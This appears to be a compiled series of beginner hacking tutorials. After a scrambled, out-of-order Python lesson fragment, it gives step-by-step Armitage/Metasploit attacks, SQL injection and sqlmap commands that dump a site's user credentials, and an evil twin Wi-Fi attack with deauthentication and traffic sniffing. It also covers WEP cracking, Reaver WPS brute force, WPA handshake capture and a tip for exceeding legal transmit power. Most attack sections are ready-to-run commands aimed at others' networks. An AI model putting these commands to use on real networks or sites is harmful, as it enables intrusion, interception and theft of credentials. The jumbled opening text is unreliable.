as “hello. and have as the first line: <span class="co1">#!/usr/bin/env python3</span> you can run the python program with .Python 3. Try typing 1+1 in. 21:31:07) [GCC 4. but you can have weird problems if you don’t follow them for module names (modules will be discussed later). World! on the*Python Shell* window. do not use them at all when programming.&gt. if you make the program executable with chmod.0 (r30:67503. In the menu at the top. The >>> is Python’s way of telling you that you are in interactive mode. These don’t matter as much for programs. Now that it is saved it can be run. Thanks for learning! . ü. create it with a text editor (Emacs has a good Python mode) and then run it with python3 program_name. To run a program. Dec 29 2008.Do not use anything other than a letter (particularly no numbers!) at the beginning of a file name. select File then New File. Always save the program with the extension .Do not use “non-english” characters (such as ä. To get into interactive mode just type python3 without any arguments. Mac OS X. ö. **************************************************************** Personal firewall software may warn about the connection IDLE makes to its subprocess using this computer's internal loopback interface. numbers. or BSD). **************************************************************** IDLE 3. This will output Hello. However. You'll get a prompt like this (most of the time) Now you'll see Armitage making some connection for you.Lesson 11: Introduction to Armitage Installing Metasploit Now metasploit is not distributed with Kali Linux (it was distributed with backtrack though). and it can be easily downloaded and installed by executing- apt-get install armitage It will check dependencies and download the required file and install Armitage for you. For a short while it might show failure messages (Connection Refused). but after some time Armitage will start. Kali has it on its repositories. you can start armitage by using the following code- service postgresql start service metasploit start armitage You will get a screen like this. and click connect. . Let the settings be as they are. After its done. becomes as easy as a click on Armitage. As a start."I'll take my leave. you can handle stuff from here". you should do a quick scan with OS detect.And you'll end up with a windows somewhat like this Now while I do believe that the developer has succeeded in making a tool which permits me to say . Armitage Basics Now the tough coding (honestly there wasn't anything tough about that) that you had to do with Metasploit. it is going to be pretty easy. you just have to follow the example given by armitage with some modification. helping you know some basic stuff before I take my leave. And while it does ask you to enter some stuff now. but I'd still go on for a while. you can see exactly what line of code is actually executed when you do something with your mouse. Better yet. First do your old ifconfig on a new terminal to find you IP . You have to figure out the next 3 digits. Most of the time.255.168. you'll have to go to Attacks -> Find attacks.168.xxx. Actually it scans IP from 192. that might or might not work.0/16.168. As expected. If you're expecting a .168.0 to 192. Everything will be quite easy. The 0/24 means it'll look at all the IPs from 192.256. enter the requisites (you learnt how to do Information gathering in the previous Metasploit tutorials).0/24. and I'm not putting any more screenshots. This is the automatically generated code after clicking OK.255.0. After that.168. and. to include all IP from 192.154. the first 6 digits are 192. Look at the sample it had provided.154.154. and you'll see an attack option.ifconfig Notice that most of the time. just copy that. replacing the 1 with 154 as in my case. Select whichever you want to try. however. There's no rocket science here.168. Now.1 to 192. you'll find your host in this range. after a few seconds. You final code should be 192. After that. right click on the computer you want to hack.168. except for the fact that the exploits in attack section will be possible exploits. you will see the following message.168.255.0. Now a couple of computers with respective OS icons will show up on your screen.0 through 192.xxx. you can enter the ip into the armitage window. you may use 192. and it tells you exactly what you're supposed to do next.168. And here's the official Armitage website (media section link. .click to hack you a Windows 7 machine. It might work with an unpatched XP machine. or the netapi one. a ms03_026_dcom might do the trick. useful vids and pics there) where you might find some more guidance. though the tool doesn't need any. then that's just not happening. Good luck with playing around with this tool. So basically. They are -  Creating structure of table  Entering data  Making queries (and getting meaningful results from data) Now. and that you can execute queries directly by changing the url. Lesson 12: Sql Injection Basics SQL Injection : How It Works Introduction Lets get started at an apparently unrelated point. Now there are three main parts of a database management system. it is common to let web users input their own queries. Now they allow you to create a query using some sort of user friendly drop down based form which lets you select your budget. Company. when we send some rogue commands to the SQL server. However. you. and give us all the otherwise private data of its tables. This is a clear indication that with proper coding. and returns an error. etc. For example. you might want to specify what kind of smartphone you want. A url ending in . This attack can be used to obtain confidential data like a list of username and passwords of all users on a website. we can send queries that will make the database 'go berserk' and malfunction. The site would probably be storing data about phones in table with columns like Name. when SQL is used to display data on a web page. can create queries and request data from their SQL servers. etc. Lets assume we create a table in SQL. preferred company. Price.php is a direct indication that the website/blog uses sql to deliver a lot of it's data. there is another method of creating queries which can be exploited by us. it doesn't understand what to do. Steps . Now this automated method of creating queries for you is relatively safe. like SQL. the user. Screen Size. Now basically the data in the SQL tables is protected. OS. if you go to a shopping website to buy a smartphone. Vulnerability has 2 criteria. Firstly. and secondly. . there are 2 ways to do them-  Manually using some standard codes available online (and if you know SQL then you can figure most of the stuff out yourself). 1. 3. Then we should obtain information about SQL version and the number of tables in database and columns in the tables. Vulnerabilities are found using your own creativity along with famous dorks (more on this in a later tutorial) For the 2nd and 3rd step. The first command is legit and gives you access to data of srinivas only. you have the username and passwords and all other information about all the users of the website. the condition 1=1 will always be true. An error is an indication of a SQL vulnerability. Effectively. we need to execute a few queries to know what all makes it act in an unexpected manner. After we know that a site is vulnerable. The second statement gives you access to data of all accounts. while the first part of the query "UserID=105" may not be true for all user. you can instruct the database to give you all the data from a table by executing the command- SELECT * FROM Users WHERE UserId = 105 or 1=1 Now. So basically the query will be prompted to return all the data about the user for all the users for whom 1=1. 2. Finally we have to extract the information from the tables. We have to find a website which is vulnerable to SQL injection (SQLi) attacks. For example. it has to allow execution of queries from the url. and only in the condition where the password is correct. it should show an error for some kind of query or the other. You still have to use commands but using tools is much more practical after you have an idea what is actually happening. . I don't recommend all the GUI Windows tools which are found on malware filled websites. there is a great tool called SQLMap that we'll be using.Some tools help in making the process easier. there is no reason not to have Kali linux installed. and if you really are serious about hacking. In Kali linux. All throughout this blog we have used Kali Linux. Using some tool . That's it for this tutorial. It might be worth your time learning some SQL on W3schools till I come up with some other tutorial. and never work. you now know how SQL Injections work. Note: Depending on a lot of factors. Enumeration .com/listproducts. it will tell you the Mysql version and some other useful information about the database. when sqlmap is done. and type - sqlmap -h It lists the basic commands that are supported by SqlMap. sqlmap my sometimes ask you questions which have to be answered in yes/no. In our case. Here are a few typical questions you might come across-  Some message saying that the database is probably Mysql.php?cat=1 Sometimes. The final result of the above command should be something like this. sqlmap -u http://testphp. especially when the server responses are slow.vulnweb. To start with.vulnweb. The answer depends on the situation.php?cat=1 --time-sec 15 Either ways. so should sqlmap skip all other tests and conduct mysql tests only. using the --time-sec helps to speed up the process. it will be- sqlmap -u http://testphp. we'll execute a simple command sqlmap -u <URL to inject>. Your answer should be yes (y). Start a terminal. Lesson 13: More SQLMap Hacking Websites Using Sqlmap in Kali linux Sql Version Boot into your Kali linux machine.  Some message asking you whether or not to use the payloads for specific versions of Mysql. then its usually better to say yes. Typing y means yes and n means no. If you are unsure.com/listproducts. php?cat=1 -D acuart --tables . now we will specify the database of interest using -D and tell sqlmap to enlist the tables using --tables command.com/listproducts. etc. The final sqlmap command will be- sqlmap -u http://testphp. List of a few common enumeration commands So first we will get the names of available databases. Information schema can be thought of as a default table which is present on all your targets. Table Now we are obviously interested in acuart database. The final result will look like - sqlmap -u http://testphp. be useful on a number of occasions.php?cat=1 --dbs So the two databases are acuart and information schema..vulnweb. we will obtain database name. column names and other useful data from the database.Database In this step. It can. however. So. but not the kind of information we are looking for.vulnweb. tables. For this we will add --dbs to our previous command.com/listproducts. and contains information about structure of databases. the table using -T. we will now get a list of columns. The final command must be something like- sqlmap -u http://testphp.php?cat=1 -D acuart -T users -- columns .vulnweb. I hope you guys are starting to get the pattern by now. The result should be something like this - Database: acuart [8 tables] +-----------+ | artists | | carts | | categ | | featured | | guestbook | | pictures | | products | | users | +-----------+ Now we have a list of tables.com/listproducts. It might contain the username and passwords of registered users on the website (hackers always look for sensitive data). The most appealing table here is users. Columns Now we will specify the database using -D. and then request the columns using --columns. Following the same pattern. and column with -C. its time we go one step ahead. of course. And the password is test.pass --dump Here's the result John Smith. Now we will be getting data from multiple columns.php?cat=1 -D acuart -T users -C email. nothing great. While that hypothesis is not completely wrong. sqlmap -u http://testphp.name. if you were following along attentively. We will get all data from specified columns using --dump. now we will be getting data from one of the columns. We will enter multiple columns and separate them with commas.com/listproducts.vulnweb.com?? Okay. As usual. table with -T. The final command will look like this. we will specify the database with -D.The result would resemble this- Data Now. you can come across more . Email is email@email. but in the real world web pentesting. You don't look pretty behind the bars. .sensitive data. Don't get tempted to join the dark side. That's it for this tutorial. Try to look at other columns and tables and see what you can dig up. the right thing to do is mail the admin of the website and tell him to fix the vulnerability ASAP. Under such circumstances. That basically means that we have to provide internet access to our client after he has connected to the fake wireless network. PS: The first 3 are primary objectives. which can be routed to out client. Picture credits : firewalls. 4.com .e. Making sure the client doesn't notice that he connected to a fake AP. We'll use airmon-ngfor finding necessary info about the network. Have fun . For that we will need to have internet access ourselves. and strong signal strength to make it connect to our network. the last one is optional and not a part of evil twin attack as such. No big deal- apt-get install bridge-utils Objectives The whole process can be broken down into the following steps- 1. 3. and then actually imitating it (i. 2. creating another access point with the same SSID and everything). maybe hack into his computer using metasploit. Forcing the client to disconnect from the real AP and connecting to yours. It is rather a man in the middle attack.monitor traffic from the client.Lesson 14: Evil Twin Evil Twin Tutorial You will also need to install a tool (bridge utils) which doesn't come pre-installed in Kali. We'll useaireplay-ng to deauthenticate the client. Finding out about the access point (AP) you want to imitate. and airbase-ng to create it's twin. a shorter code will be- . Open a new terminal. so choose the network accordingly. Replace them in given code- airbase-ng -a <BSSID here> --essid <ESSID here> -c <channel here> <interface name> If you face any problems. Now after you have selected the network. take a note of it's ESSID and BSSID. press ctrl+c and leave the terminal as is.Information Gathering . Remember.airmon-ng To see available wireless interfaces- iwconfig To start monitor mode on the available wireless interface (say wlan0)- airmon-ng start wlan0 To capture packets from the air on monitor mode interface (mon0) airodump-ng mon0 After about 30-40 seconds. you need to have a client connected to the network (this client will be forced to disconnect from that network and connect to ours). Creating the twin Now we will use airbase-ng to create the twin network of one of the networks that showed up in the airodump-ng list. net Telling the client to get lost Now we have to ask the client to disconnect from that AP. We need to force it to disconnect from the real network and connect to the twin. However. Also. After you are done entering the parameters and running the command. Note : We will need to provide internet access to our client at a later stage. and won't be able to provide you with internet connectivity. the first part is to force it to disconnect. Aireplay will do that for us- aireplay-ng --deauth 0 -a <BSSID> mon0 --ignore-negative-one . For this. or broadband/ADSL/3G/4G/2G internet. Our twin won't work if the client is connected to the other network. either you need another card. the BSSID can be randomly selected too. The only thing identical about the twins has to be their ESSIDs (which is the name of the network). Make sure you have a method of connecting to the net other than wireless internet. Man in the middle attack : Pic Credits: owasp. The interface would be mon0 (or whatever is the card you want to use) . because your card will be busy acting like an AP. it is better to keep all parameters same to make it look more real. So. you'll see that airbase turned your wireless adapter into an access point. and doesn't have to match with the target.airbase-ng --essid <name of network> mon0 Remove the angular brackets (< & >) and choose any channel that you want. he .The 0 species the time internal at which to send the deauth request. there is another option. You can leave him with no options. 1 would mean send a packet every 1 seconds. we need more signal strength. iw reg set BO iwconfig wlan0 txpower 30 It is strongly advised to not break laws as the transmission limits are there for a reason. There are 2 ways to do that- 1. 2 would mean a packet every 2 seconds. and so on. so all the clients (not just one) connected to the network will disconnect. but many countries don't allow the card to transmit at such powers. however. 2. the client should connect to you if your signal strength is stronger than that you the real twin. Alfa cards usually support upto 30dBm. don't press ctrl+c after the client has disconnected). If you keep transmitting the deauth packets continuously (i. we can overcome the power limitation. In Bolivia. and some can transmit at extremely high power. We need to make our AP stand out. Some cards can't transmit at high power. Physically move closer to the client. and very high power can be harmful to health (I have no experimental evidence). Nevertheless. so fire up the command. and for that. 0 means extremely fast.e. then your client would be disconnected in a matter of seconds. Try changing 27 to 30 and you'll see what I mean. Power up your wireless card to transmit at more power. and press ctrl+c after a few seconds only. you can transmit at 30dBm. Note that the deauth is sent on broadcast. If you keep it as 0. Disconnecting a specific client is also possible. Not the real one. instead of trying to connect to ours. and by changing the regulatory domain. the client may choose to keep trying to connect to the same AP a few more times. but why the fake one Even after being disconnected from the real AP. Note : If you are unable to get your client to connect to you. The latter can be done with the following command - iwconfig wlan0 txpower 27 Here 27 is the transmission power in dBm. we will consider that we have an interface x0 which has internet connectivity. we'll use dhclient . and the client will go back to the real twin as soon as it gets the chance. and you can route the internet access to your client.0. you just have to know which interface is providing you with internet.This has internet access  at0 . will have no choice but to connect to you. Nevertheless. replace x0 with wlan1 or wlan0. Now.0.  evil . a 3G modem will show up as ppp0. whose job will be to actually bridge the networks. Execute the following code- brctl addbr evil This will create the bridge. Now we have to specify which two interfaces have to be bridged- brctl addif evil x0 brctl addif evil at0 We can assign an IP to the interfaces and bring them up using- ifconfig x0 0. then the clients connected to your fake wireless network can connect to the net. If you can somehow give internet access to at0. However. In this tutorial.This is create by airbase-ng (wired face of the wireless access point). Give the fake AP internet access Now we need to provide internet access to the fake AP.0 up Also bring up the evil interface (the interfaces aren't always up by default so we have to do this many times) ifconfig evil up Now to auto configure all the complicated DHCP settings.0 up ifconfig at0 0.0. This can be done in various ways. if you are connected to net via wireless. Creating evil We will use Bridge control utility provided by Kali.This is an interface that we will create. brctl. this is quite an unstable situation.0. Interfaces  x0 . all the configurations have been completed. I won't teach you how to use it here. However. and I'll write a detailed tutorial for it later. the evil twin attack is complete.html . http://www. He will not have any way to find out what went wrong.dhclient3 evil & Finally. The client is now connected to your fake network. This actually comes under a Man In The Middle attack (MITM). I will give you some idea what you can do. since it is a GUI tool. the last objective remains. Officially.wireshark. However. for the time being. Have fun Now that the client is using the internet via our evil interface. which will show you all the interfaces you have created. and these packets can be monitored via wireshark. You can execute ifconfig and see the results.org/docs/wsug_html_chunked/ChapterIntroduction. and can use the internet pretty easily. Pic credits: The picture on the right has been directly taken from their website. Sniffing using Wireshark Now all the packets that go from the user to the internet pass through out evil interface. You can take a look at their website to get an idea on how to use wireshark. we can do some evil stuff. Get access to an elevated command prompt (with administrator privileges). [On Windows 8 : Press Windows key + X or hover your mouse to the lowermost corner on the left part of the screen and right click. So non-hackers too can follow from here on. For everyone 1. This article concentrates only on the former part of the exercise. Then click "Command Prompt Admin" . You are going to need two adapters for this task. and another on Kali Linux which will hack the network. This article is relevant and important here since the best way to start with hacking is to practice on yourself. One on Windows which will create the network. and we'll only create an ad-hoc network here.Lesson 15: Ad-Hoc Networks (Pentesting yourself the legal way) Create A Wireless Ad-Hoc Network on Windows 8 Using command line For the hackers This method works with all versions of Windows. 2. Now type netsh wlan show drivers 3. If the hosted network supported says yes, move on to the next step 4. Now type - netsh wlan set hostednetwork mode=allow ssid=<enter_network_name_here> key=<enter_password_here> 5. Finally type netsh wlan start hostednetwork. Your ad-hoc network is ready. Lesson 16: Creating a dummy Wi-Fi network for pentesting Creating A dummy wifi for hacking What you'll need At least 2 wireless adapters. I've got three. First one is the internal adapter which came with my laptop. The other 2 are DLink adapters. This is what it looks like. My Dlink Adapter we can use one of them to create a wireless network on Windows and then practice hacking it on a virtual Kali Linux machine. Its a sort of convention I guess) What now Now since we have multiple adapters. . This is what it looks like on my Windows machine ( I blurred the names a bit. This is our newly created network. Now we can turn on our Kali machine and see if it is discovered there. etc. WPA. and practice our hacking skills on our dummy wifi network) .So it showed up pretty fine. We can use netsh to modify the security parameters as necessary (WEP. Everything else is abstracted though the virtualization engine. then you are ready to proceed to the stage where you follow an intermediate level hacking tutorial. In this tutorial.Lesson 17: Speeding up WEP Hacking in Kali Linux Speeding Up WEP Hacking In Kali Now if you have followed the basic WEP hacking tutorial. Compare VirtualBox with VMware Fusion and Parallels for Mac. we will look at the intricate details of what is happening and approach the complicated methods and concepts. Please note that a wireless adapter can only be used by only one machine at a time. I'll address a common question 14 March 2014 19:28 i couldn't find any wlan when i write ifconfig in terminal 1. 1. not the virtual machine. (Though . Are you using Kali Linux on a virtual machine. To start with. The only devices that can be directly accessed are usb devices. This question has been discussed at length on superuser forums. The conclusion is that you can't directly connect internal wifi card using any Virtual machine software- "Unfortunately no virtualization software allows for direct access to hardware devices like that. All 3 of those programs behave the same way. Your host machine has access to the wireless adapter. I wish I could give you a better answer. I am just providing the commands which will be enough to find out whether injectipn is working or not. if you don't have Kali Linux (or Backtrack) installed yet. http://beginnnerhacking." Basically you have to buy an external wireless card. you could argue that the vm has lower level access to cd rom's and storage devices).0. A virtual machine can only use computer hardware if it is externally connected via USB. but still. then its time to buy an external adapter or two (the more the better).blogspot.0. take a look here. You might check their website out for it. you can side install Kali with Windows or run it via a USB.1:666 .in/2014/02/creating-dummy-wifi-for- hacking.html So basically you have 2 choices. If that's not a possibility. I personally use two of them myself. First. Secondly. They aren't very expensive. you will have to install it before you can start this tutorial. Check Injection Support Aircrack-ng has a comprehensive article related to checking injection support. but it might be possible). Now there is another catch here. almost all of them. you might want to spend hours trying to get a driver which might make your internal adapter support injection (I don't know anyone who succeeded in this. If you want to see what I use. you can buy a new external wireless adapter (no referral links here). From now we'll refer to wlan0/wlan1 as mon0 airserv-ng -d mon0 aireplay-ng -9 127. So if you really want to go in depth of wireless hacking. The internal adapters. than simply to buy a usb wireless card. don't support injection. This is extremely important for speeding up wireless hacking. Kali Linux I don't know why it needs mention here. airmon-ng start wlan0 [or wlan1] (Puts your wireless adapter in monitor mode. we will use airodump-ng mon0 to see the list of networks in range. So finally you have checked your injection capabilities.This basically sets up a temporary server sort of thing that is waiting for you to test your injection capabilities. There is information regarding the same in the same aircrack-ng tutorial. First. The general form is somewhat like IP:port. .1 is the IP which is reserved for loopback. and succeeds. 127. you'll have to buy a card which supports injection. Most of the time. or see some forum posts which will help you figure something out. See the one you want to hack. Check Signal Strength While the basic hacking methods from the previous post don't have any real strength restriction.0. It is always used when you are carrying out some command on yourself. If not. The second command actually tries to inject the server."Injection is working!" should bring a smile to your face. and the last line . I'm gonna summarize what you have to do here. what follows an IP and a colon is the port. Again. Airodump-ng lists the networks in range. 666 is the port we are using.0. you need to be physically close to the access point in order to inject packets. 2  Mac address of genuine users connected to the network:  Interface : wlan1 .referred to as mon0 You should gather the equivalent information for the network you will be working on. The last line 30/30 : 100% determines how good the strength of the signal is.DIGISOL  BSSID . we actually injected packets into the target computer. The reason is that this tutorial depends on receiving at least one ARP request packet and if there are no active clients then there will never be any ARP request packets. at this stage. type the following code- aireplay-ng --test -e DIGISOL -a 00:17:7C:22:CB:80 mon0 The last time we checked whether the wireless card had the capability to inject packets. A very high percentage is a good sign. Now. Then just change the values whenever I use them in any of the commands Note : We need at least one user (wired or wireless) connected to the network and using it actively. and it means that you are most probably going to be able to hack this network. we will simply execute the following code- airodump-ng [interface] -c [channel] airodump-ng mon0 -c 2 This will make the wireless card only read packets in the channel no. on which our target network is. Make a note of the BSSID of the network you want to hack. Now to test the network.00:17:7C:22:CB:80  CH (channel) . We tested it on our own computer. . and 100 is ideal. We should. then it's pretty good news. This time. A good practice is to store all the information gathered in any text editor. If this worked. Now we will hack the digisol network. 2. to check whether the signal strength will be sufficient. take a note of following:-  ESSID . we will inject the network. While it makes our work easier to just follow two steps. this time we will pass the -w command which will instruct airodump-ng to save the output to a file.cap Now we can keep this terminal running and it will keep saving the packets. airodump-ng -c [channel] --bssid [bssid]-w [file_name] [interface] airodump-ng -c 2 --bssid 00:17:7C:22:CB:80 -w dump mon0 Now the output will be saved in a file dump-01.Capture Packets Now we have already run airodump-ng a couple of times. the step we are going to do last. These packets will fill up the data column of our airodump-ng capture.e. [In the previous tutorial we did only 2 things.e this step. and crack it. We will thus obtain ARP packets. i. or use the fake authentication feature. we can start attempting to get the password using aircrack-ng. and data is what will help us obtain the password. You can either mask your mac address to one of the already connected clients. since we are simply a passive packet listener. it also makes the process much more time consuming. who is not doing anything] Speeding Things Up Fake Authentication Now to speed things up. Enter the following code to make aireplay-ng listen to the AP for . As soon as we have 10000 data packets. Without IVs you can't hack a network. However. (If you see an error like the AP is on channel x and mon0 is on channel y then go to the bottom of the post for troubleshooting) aireplay-ng -1 0 -e DIGISOL -a 00:17:7C:22:CB:80 mon0 Authenticated and capturing packets ARP request replay mode ARP packets are your best bet at getting a lot of IVs or data. i. or have to pretend to be one. Now to make the AP pay attention to your injected packets. We will do the latter. capture the packet. you either have to be a connected client. cap In our case. And the data packets will start filling in with Godspeed.ARP packets. Slow start Everything got fine after some time After some time I had enough packets to crack almost any network The data filled in VERY fast The video shows how fast the IVs flowed in after ARP injection started. This is the real speeding step. As soon as it gets one. the command will be aircrack-ng dump-01.cap . the terminal will sort of explode. Now this is the part where an active user on the network is absolutely necessary. Cracking the network Cracking the network is as easy as typing the following into the console aircrack-ng name_of_file-01. and inject them as soon as they find one. This will create a lot of data very fast. aireplay-ng -3 -b [BSSID] mon0 This is what the final code will look like- aireplay-ng -3 -b 00:17:7C:22:CB:80 mon0 This is what it'll look like in the beginning Now you'll have to wait for some time till it gets an ARP request. take a look here .org/showthread. and the second step alone solved my problem. with the options. How can i fixed this? i looked a lot for a real answer but nobody know what is this. The password was cracked in less than a second. After pressing enter. Troubleshooting A person commented on another wireless hacking post. specify the channel - usage: airmon-ng [channel or frequency] Your code : airmon-ng start wlan0 6 Substitute 6 with the required channel.http://ubuntuforums. you will have a list of networks and you'll be prompted to select which one of them to hack. then the problem might be more complicated. This is the problem he faced. whenever i try to use aireplay-ng.php?t=1598930 . I have blurred out the password and some random stuff. or a screenshot. so I couldn't get that screen. try the following- 1) When you start the monitor mode. If your airmon-ng assigns itself a fixed channel on its own will. 2) While starting airodump. without you even specifying it. In my case there was just one network. specify the channel airodump-ng mon0 -c 6 I was facing this problem when my mon0 kept hopping from one channel to the other. always fail saying that mon0 is in channel -1 and the target is in other channel. This is a possible solution Okay. If the above steps don't solve the problem. So finally you have obtained the password of the network you were trying to hack. it had a hole. good dictionaries are huge. a new security measure was introduced to compliment WPA. Here's what wikipedia says about WPS- Created by the Wi-Fi Alliance and introduced in 2006. Rainbow tables are known to speed things up. by completing a part of the guessing job beforehand. Also. the goal of the protocol is to allow home users who know little of wireless security and may be intimidated by the . but the output rainbow table that needs to be downloaded from the net is disastrously large (can be 100s of GBs sometimes).Lesson 18: Hack WEP with WPS enabled Hack WPA/WPA2 WPS . Wifi Protected Setup (WPS). which is now well known. An exhaustive bruteforce including all the alphabets (uppercase lowercase) and numbers.Kali Linux WPA/WPA-2 When it was known that a WEP network could be hacked by any kid with a laptop and a network connection (using easy peasy tutorials like those on our blog). and tools like reaver can exploit it in a single line statement. A dictionary attack may take days. but it is much better than the previous scenario in which months of brute-forcing would yield no result. and much easier to configure (push a button on router and device connects). It still might take hours. Now basically it was meant to make WPA even tougher to crack. depending on password length. may take years. However. And finally the security folks were at peace. But it was not over yet. With this in mind.Reaver . as the new WPA technology was not at all easy for the users to configure. and still might not succeed. the security guys did succeed in making a much more robust security measure WPA/WPA2. Now hacking WPA/WPA2 is a very tedious job in most cases. as well as making it easy to add new devices to an existing network without entering long passphrases.e. and most probably the correct pin will not be the last combination. i. there is a delay because we have to wait for APs response. The flaw allows a remote attacker to recover the WPS PIN in a few hours with a brute-force attack and. Now that'll be years. although this may not be possible on some router models. Users have been urged to turn off the WPS feature. than to guess 8 correct digits at once. 8 digits and 10 possibilities per digit (0-9) make it 10^8 (interpret ^ as raised to the power of)seconds if we assume one key per second.  The pin number for verification goes in two halves. A major security flaw was revealed in December 2011 that affects wireless routers with the WPS feature. Now a pin has 8 digits. you have to consider the fact that there may be number. And believe me.  The 8th digit is a checksum of first 7 digits. several competing solutions were developed by different vendors to address the same need. alphabets. the first half would take 10^4 guess and the second would take 10^3. 10^7 possibilities. the client sends 8 digit pins to the access point. its easy to guess 4 digits correct two times. so we can independently verify the first four and the last four digits. So basically. Now in WPS. so you can expect to reach . with the WPS PIN. and sometimes symbols (and more than 8 letters). Basically. the network's WPA/WPA2 pre- shared key. So that'll take 3 hours approximately. Two months. available security options to set up Wi-Fi Protected Access. and we may only try a few keys per second (practically the best I've seen on my PC is 1 key per 2 sec). and only contains numbers. so its a possible target for bruteforece. still a way to go. This make the task a billion billion times tougher. And that's all the combinations. one-tenth time. we can try thousands of keys per second. there are flaws in this technology that can be used against it. which verifies it and then allows the client to connect. Under normal bruteforcing of WPA passwords. which make it a tad bit easier. there is a new concept of using pins for authentication. Working Of WPS Now while most of the things are the same as in WPA. However. which most recent models have enabled by default. Basically.000 guesses. Now we need 11. where is this taking us? The answer is. So. Prior to the standard. Now the guesses would be 10^4 + 10^3 (not 10^4 *10 ^3). the assumption is that bruteforcing will take place at a key per second. come back 10 mins later. Here are the steps-  Set your wireless interface in monitor mode- airmon-ng start wlan0 . but you'll need to install Reaver on your own. the result earlier. then the attack will not work. If not. check the progress (must be 1% or something). See the last section of this post on = troubleshooting by scrolling down a bit) Information Gathering Now you need to find out the following about you target network-  Does it have WPS enabled. you need to have Kali linux (or backtrack) up and running on your machine. How to carry out the attack Now it might have been tough to carry out this attack at some point in history. However. you can either use wash or just use the good old airodump-ng. If you have all the prerequisites. and thereby is much easier to use. its a breeze. then tag along. Now to check whether the network has WPS enabled or not. and you might have to do a live boot using live CD or live USB of Kali Linux. if you're a newbie. then hacking the network would be as easy as reaver -i <interface-name> -b <BSSID of target> And if you are already familiar with hacking WEP. Kali Linux First off. (Reaver has a known issue : Sometimes it doesn't work with Virtual Machines. but now. and yours might drop to as low as a key every 10 seconds.  The BSSID of the network. and go take a nap. then just go to your Kali Linux terminal and type the above command (replacing what needs to be replaced). Wash is specifically meant to check whether a network has WPS enabled or not. However. Leave your machine as is. My personal best is a key every 2 seconds. Any other Linux distro might work.  Use wash (easy but sometimes unable to detect networks even when they have wps enabled). Update : wash -i mon0 --ignore-fcs might solves the issue. If you see it. or move on to airodump method. then you'll have to do some howework. If any network shows up there. airodump-ng mon0 . It will show all networks around you. it has WPS enabled.  Use airodump-ng. wash -i mon0 This will show all the networks with WPS enabled This is an error which I haven't figured out yet. and then move to next steps. You'll have to assume they have WPS. It tells which of them use WPA. Reaver Now finally we are going to use Reaver to get the password of the WPA/WPA2 network. Remember creating a monitor interface mon0 using airmon-ng start wlan0.interface used. Most importantly. Copy the BSSID of the network you want to hack. and all you need to do is enter- reaver -i mon0 -b XX:XX:XX:XX:XX:XX Explanation = i . Keep this copied. you should have a BSSID column in the result that you get.Now irrespective of what you used. None of them has WPS enabled. BSSID of the network . so it was hacked in 3 seconds. Basically. That's all the information you need. it writes everything thats going on to the terminal. as you'll need it. So final command should be- reaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv After some hours. This helps you see whats happening. and if needed. This is what we are using. However. track the progress. This is all the information that Reaver need to get started. you will see something like this. Reaver comes with many advanced options. just saying. which increases the verbosity of the tool. do some troubleshooting. Reaver makes hacking very easy. which is the BSSID of your target network. . So by now you must have something like XX:XX:XX:XX:XX:XX. you should use the -vv option. The pin in this case was intentionally 12345670. -b species the BSSID of the network that we found out earlier. and some are recommended by me. Something wrong with wireless card. such errors suggest- 1. 4. You are very far from the AP. which might prove useful (or more like consoling. Sometimes. 4. Do a fakeauth using aireplay-ng (Check speeding up WEP hacking) and tell Reaver not to bother as we are already associated using -A (just add -A at the end of your normal reaver code) 4. Sometimes it never gets a beacon frame. and gets stuck in the waiting for beacon frame stage. (see pictures below) 2. 2. Possible workarounds- 1. Sometimes it never associates with the target AP. Sometimes. or never comes. I don't know why. In most cases. AP is very choosy. In my case. 3. (Yours will be mon0 instead of wlan0). booting up from USB and using internal adapter increased the signal strength and speeded up the bruteforce .Troubleshooting 1. killing naughty processes helps. The AP does not use WPS. and a (0x02) or something error is displayed. Move closer to target AP 3. you saw the first line read "Switching wlan0 to channel 6". 3. but sometimes internal adapters work wonders.Here is an extra section. As in the pic above. it keeps switching interfaces forever. to let you know you are not the only one who is having troubles) Known problems that are faced . and can't be used from inside of a VM. 2. try booting into Kali using USB. Sometimes the response is too slow. won't let you associate. If you are using Kali Linux in Vmware. It is recommended that you do a live boot. It does not work well inside Virtual machines. I have verified my observation with various hackers. Update : It has nothing to do with internal adapter. and it is now a known problem with Reaver. processes causing problems Kill 'em all .process. Then we'll match the hash we created with the one that's there in the handshake. We will also see what problems one can face during the process (I'll face the problems for you). the attacker. Now if the hashes match. If the process sounds really time consuming to you. some optional wikipedia theory on what a 4-way handshake really is (you don't want to become a script kiddie do you?) The Four-Way Handshake The authentication process leaves two considerations: the access point (AP) still needs to authenticate itself to the client station (STA). We can take all possible passwords that can exists. and the wireless access point. Now there are various different ways cracking of WPA can be done. and thus hashing is a robust protection method. But there is one thing we can do. Also.e. The PTK is generated by concatenating the following attributes: PMK. they have a 4 way handshake that we can capture. i. AP nonce (ANonce). so hacking WPA-2 PSK involves 2 main steps- 1. Cracking the hash. a client who'll connect to the wireless network. then its because it is. This handshake has the hash of the password. Getting a handshake (it contains the hash of password. before that. This key is. designed to last the entire session and should be exposed as little as possible. Therefore the four-way handshake is used to establish another key called the PTK (Pairwise Transient Key). encrypted password) 2. But since WPA is a long shot. and keys to encrypt the traffic need to be derived. STA .Lesson 19: Hack WPA-2 PSK Capture Handshake Hack WPA-2 PSK Capturing the Handshake WPA password hacking Okay. The earlier EAP exchange or WPA2-PSK has provided the shared secret key PMK (Pairwise Master Key). Now there's no direct way of getting the password out of the hash. we shall first look at the process of capturing a handshake. we know what plain text password gave rise to the hash. What happens is when the client and access point communicate in order to authenticate the client. thus we know the password. What you need is you. WPA hacking (and hash cracking in general) is pretty resource intensive and time taking process. Now the first step is conceptually easy. and convert them to hash. however. nonce (SNonce). The AP sends the GTK and a sequence number together with another MIC. All the above messages are sent as EAPOL-Key frames.AP uses this key to encrypt additional data sent (in the 'Key Data' field) to the client (for example. This sequence number will be used in the next multicast or broadcast frame. including authentication. The client now has all the attributes to construct the PTK. The STA sends its own nonce-value (SNonce) to the AP together with a MIC. 16 bytes of EAPOL-Key Confirmation Key (KCK)– Used to compute MIC on WPA EAPOL Key message 2. The STA sends a confirmation to the AP. The actual messages exchanged during the handshake are depicted in the figure and explained below: 1. AP MAC address. the RSN IE or the GTK) 3. and STA MAC address. which is really a Message Authentication and Integrity Code: (MAIC). The product is then put through PBKDF2-SHA1 as the cryptographic hash function. so that the receiving STA can perform basic replay detection. As soon as the PTK is obtained it is divided into five separate keys: PTK (Pairwise Transient Key – 64 bytes) 1. used to decrypt multicast and broadcast traffic. 16 bytes of Temporal Key (TK) – Used to encrypt/decrypt Unicast data packets . 16 